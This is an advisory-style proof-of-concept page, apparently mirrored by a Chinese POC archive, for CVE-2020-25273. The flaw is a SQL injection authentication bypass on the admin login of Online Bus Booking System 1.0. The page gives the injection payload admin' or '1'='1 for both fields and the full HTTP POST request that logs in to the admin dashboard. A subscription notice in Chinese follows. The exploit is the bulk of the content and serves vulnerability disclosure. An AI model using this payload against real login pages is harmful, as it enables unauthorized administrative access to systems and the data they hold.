关联漏洞
Description
Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.
介绍
# CVE-2020-25273
Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.
#Vendor - SourceCodester
#Product -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Vulnerability Type - Authentication Bypass
#Affected Component - bus_booking/admin.php
#Attack Type- Local
#Privilege Escalation - true
#Impact Code execution - true
> ***Attack Vector***
> 1) Go to Admin Login Panel and try to bypass
>
> 2) In request payload, set
>
> username : admin' or '1'='1
>
> password : admin' or '1'='1
>
>__________________________________
>
> POST /bus_booking/login_auth.php HTTP/1.1
>
> Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
>
> username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
>
>________________________________________________________
>
>Successfull logged in to Admin Dashboard
文件快照
[4.0K] /data/pocs/81691eb12db0913596851730a036eae3a948215a
└── [ 949] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →